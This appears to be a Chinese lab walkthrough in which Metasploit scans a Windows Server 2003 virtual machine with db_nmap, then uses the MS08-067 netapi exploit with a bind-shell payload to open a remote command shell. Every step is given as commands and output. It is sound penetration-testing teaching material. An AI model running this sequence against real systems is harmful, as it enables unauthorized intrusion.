被攻击者IP：192.168.128.149                        操作系统：Windows Server 2003

第一步，检测数据库的连接状态：

msf > db_status

[*] postgresql connected to msf

第二步：开始扫描运行的服务：

msf > db_nmap -sS -sV -O -n 192.168.128.149

[*] Nmap: Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-06 16:54 CST

[*] Nmap: Nmap scan report for 192.168.128.149

[*] Nmap: Host is up (0.00025s latency).

[*] Nmap: Not shown: 986 closed ports

[*] Nmap: PORT     STATE SERVICE         VERSION

[*] Nmap: 21/tcp   open  ftp             Microsoft ftpd

[*] Nmap: 80/tcp   open  http            Microsoft IIS httpd 6.0

[*] Nmap: 135/tcp  open  msrpc           Microsoft Windows RPC

[*] Nmap: 139/tcp  open  netbios-ssn     Microsoft Windows netbios-ssn

[*] Nmap: 445/tcp  open  microsoft-ds    Microsoft Windows 2003 or 2008 microsoft-ds

[*] Nmap: 777/tcp  open  multiling-http?

[*] Nmap: 1025/tcp open  msrpc           Microsoft Windows RPC

[*] Nmap: 1026/tcp open  msrpc           Microsoft Windows RPC

[*] Nmap: 1027/tcp open  msrpc           Microsoft Windows RPC

[*] Nmap: 1031/tcp open  msrpc           Microsoft Windows RPC

[*] Nmap: 6002/tcp open  http            SafeNet Sentinel Protection Server 7.3

[*] Nmap: 7001/tcp open  afs3-callback?

[*] Nmap: 7002/tcp open  http            SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)

[*] Nmap: 8099/tcp open  http            Microsoft IIS httpd 6.0

[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

[*] Nmap: SF-Port777-TCP:V=7.50%I=7%D=8/6%Time=5986D987%P=i686-pc-linux-gnu%r(Kerber

[*] Nmap: SF:os,5,"\x01\0\t\xe0\x06")%r(SMBProgNeg,5,"\x01\0\t\xe0\x06")%r(TerminalS

[*] Nmap: SF:erver,A,"\x01\0\t\xe0\x06\x01\0\t\xe0\x06")%r(WMSRequest,5,"\x01\0\t\xe

[*] Nmap: SF:0\x06");

[*] Nmap: MAC Address: 00:0C:29:93:BD:3F (VMware)

[*] Nmap: Device type: general purpose

[*] Nmap: Running: Microsoft Windows XP|2003

[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003

[*] Nmap: OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003

[*] Nmap: Network Distance: 1 hop

[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 158.59 seconds

第三步：搜寻ms08_067漏洞

msf > search ms08_067

 

Matching Modules

================

 

   Name                                 Disclosure Date  Rank   Description

   ----                                 ---------------  ----   -----------

   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

 

第四步：使用

msf > use exploit/windows/smb/ms08_067_netapi

 

第五步：查看需要设置的选项

msf exploit(ms08_067_netapi) > show options

 

Module options (exploit/windows/smb/ms08_067_netapi):

 

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST                     yes       The target address

   RPORT    445              yes       The SMB service port (TCP)

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

 

 

Exploit target:

 

   Id  Name

   --  ----

   0   Automatic Targeting

 

//设置目标主机ip

msf exploit(ms08_067_netapi) > set RHOST 192.168.128.149

RHOST => 192.168.128.149

msf exploit(ms08_067_netapi) > show options

 

Module options (exploit/windows/smb/ms08_067_netapi):

 

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST    192.168.128.149  yes       The target address

   RPORT    445              yes       The SMB service port (TCP)

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

 

 

Exploit target:

 

   Id  Name

   --  ----

   0   Automatic Targeting

 

 

 

Module options (exploit/windows/smb/ms08_067_netapi):

 

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST    192.168.128.149  yes       The target address

   RPORT    445              yes       The SMB service port (TCP)

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

 

 

Payload options (windows/shell_bind_tcp):

 

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique (Accepted: \'\', seh, thread, process, none)

   LPORT     4444             yes       The listen port

   RHOST     192.168.128.149  no        The target address

 

 

Exploit target:

 

   Id  Name

   --  ----

   0   Automatic Targeting

 

//开始exploit得到shell

msf exploit(ms08_067_netapi) > exploit

 

 

[*] Started bind handler

[*] 192.168.128.149:445 - Automatically detecting the target...

[*] 192.168.128.149:445 - Fingerprint: Windows 2003 -  - lang:Unknown

[*] 192.168.128.149:445 - Selected Target: Windows 2003 SP0 Universal

[*] 192.168.128.149:445 - Attempting to trigger the vulnerability...

[*] Command shell session 1 opened (192.168.128.145:32839 -> 192.168.128.149:4444) at 2017-08-06 17:01:09 +0800

 

Microsoft Windows [Version 5.2.3790]

(C) Copyright 1985-2003 Microsoft Corp.